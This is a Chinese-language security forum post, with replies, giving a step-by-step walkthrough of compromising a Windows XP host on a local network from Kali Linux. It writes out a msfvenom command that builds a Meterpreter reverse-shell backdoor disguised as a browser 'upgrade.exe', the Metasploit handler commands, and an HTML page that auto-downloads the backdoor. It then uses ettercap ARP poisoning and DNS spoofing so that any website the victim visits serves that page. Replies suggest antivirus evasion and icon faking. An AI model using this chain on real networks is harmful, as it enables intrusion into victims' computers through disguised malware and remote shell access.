用户
搜索

[通信安全] kali渗透windowsXP过程

  • TA的每日心情
    无聊
    2017-5-25 10:08
  • 签到天数: 7 天

    连续签到: 2 天

    [LV.3]偶尔看看II

    i春秋签约作家

    Rank: 7Rank: 7Rank: 7

    45

    主题

    75

    帖子

    390

    魔法币
    收听
    0
    粉丝
    10
    注册时间
    2015-11-20

    i春秋签约作者

    发表于 2017-5-19 14:18:52 117796
    作者:雪文

    这只是一个演示我自己搭建的环境,但是成功率非常高的,对方可以是其系统,首先我开启kali在打开kali终端输入nmap –sP 192.168.1.1/24 这里的ip是我的网关地址你可以输入自己的网关地址(生活中网关就是路由器地址)这段语句是扫描局域网内存活的主机如图
    s.png
    这个被框住的IP就是我的目标192.16它8.1.117接下来输入nmap –sC 192.168.1.117这句语句的意思是探测主机类型以及其它信息(nmap非常强大,要多利用)
    1.png
    当然这个目标主机我打过补丁了一些漏洞无法利用例如非常流行的MS08-067这个漏洞,好吧不水了上肉戏,接下来就要玩DNS欺骗了不过提前我们要先做个后门程序很简单用一道命令就可以msfVENOM -p  windows/meterpreter/reverse_tcp lhost=192.168.1.116 lport=4444 -f exe > /var/www/html/upgrade.exe  IP你可以换成自己的,不过可能被杀,你可以直接手动免杀一下,免杀我就不讲了
    2.png
    在终端输入msfconsole启动Metasploit如图
    3.png
    再依次输入以下语句
    use exploit/multi/handler
    set LHOST 192.168.1.116
    set LPORT 4444
    set payload windows/meterpreter/reverse_tcp
    show options
    exploit
    这些语句的意思是设置自己的ip和端口查看配置启动exploit然后等待程序运行我懒得一个个表明大致说一下就行,接下来就是DNS欺骗了首先找到这个路经etc/ettercap/修改这个文件etter.dns
    4.png
    红框圈住的地方是我添加的我的IP地址,你们可以学着我添加不过要是自己主机的IP才可以,修改完后保存一下,然后在转到这个目录/var/www/html/修改这个文件index.html代码如下
    [AppleScript] 纯文本查看 复制代码
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
    <head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
    <title>请下载进行升级浏览器</title>
    </head>
    <body>
    <script language="javascript">
    window.onload = function(){
    window.location.href="upgrade.exe";
    }
    </script>
    </body>
    </html>

    当然你可愿意自己写一些其它的,不过我一般喜欢这种,修改之后再把我们刚开始生产的后门复制到这个目录下/var/www/html/转到终端输入/etc/init.d/apache2 start启动apache2服务器(意思就是把本机当作服务器)接下来转到终端输入ettercap –G进入ettercap图形化界面
    5.png                                  6.png
    点解unified sniffing选择网卡点确定 接下来按顺序点scan for hosts和Hosts list扫描和列出主机
    7.png 8.png
    接下来我这里的网关是192.18.1.1我点击一下网关地址再点击Add to target 1然后再点击我要攻击的地址在选择Add to target 2
    9.png
    接下来选择mitm中的arp poisoning选项它会弹出一个窗口你直接选择第一个点确定
    然后在选择选项跳到这个页面我们玩的是欺骗所以双击dns_spoof
    10.png
    再然后我们就选择strat中的start sniffing选项开始DNS欺骗
    然后目标主机只要打开网站就会有这种情况,不管访问任何网站
    11.png
    接下来对方下载文件运行一下就会启发我们的后门
    12.png 13.png
                                    
    触发成功后就是这样接下来你先干什么都可以了不过前提你最好会一些dos命令你可以输入shell进入他的系统命令行状态

    14.png
    我这有些乱码 好了 就这样吧

    666前排 啊
    使用道具 举报 回复
    板凳
    使用道具 举报 回复
    就总的来说利用的是DNS欺骗是吧表哥
    使用道具 举报 回复
    发表于 2017-5-20 06:56:30
    学习一下
    使用道具 举报 回复
    发表于 2017-5-20 10:55:28
    看看。。。。。。
    使用道具 举报 回复
    发表于 2017-5-20 11:04:59
    来啊~快活啊~
    使用道具 举报 回复
    发表于 2017-5-20 14:46:28
    乱码 改字符编码就好了   在者 你需要想办法 吧图标伪造了,太难看了,另一方面    如果随访有一些联网控制的软件   比如 火绒  会弹窗的   在者,,,,你没做免杀,杀软直接报毒
    做自己的自己 和平年代的炮灰,战争年代的爆破鬼才
    使用道具 举报 回复
    发表于 2017-5-21 14:07:44
    回复看看吧
    使用道具 举报 回复
    发表于 2017-5-22 09:44:03
    既然写文章.  就写详细点嘛.  免杀又不难.  写出来给小白学习一下也好.  不然小白来看啥?
    提莫队长正在待命
    使用道具 举报 回复
    发表于 2017-5-22 10:44:49
    DNS欺骗加,利用下载替换,其实还有个脚本更简单
    使用道具 举报 回复
    发表于 2017-6-1 14:18:19
    谢谢分享。
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册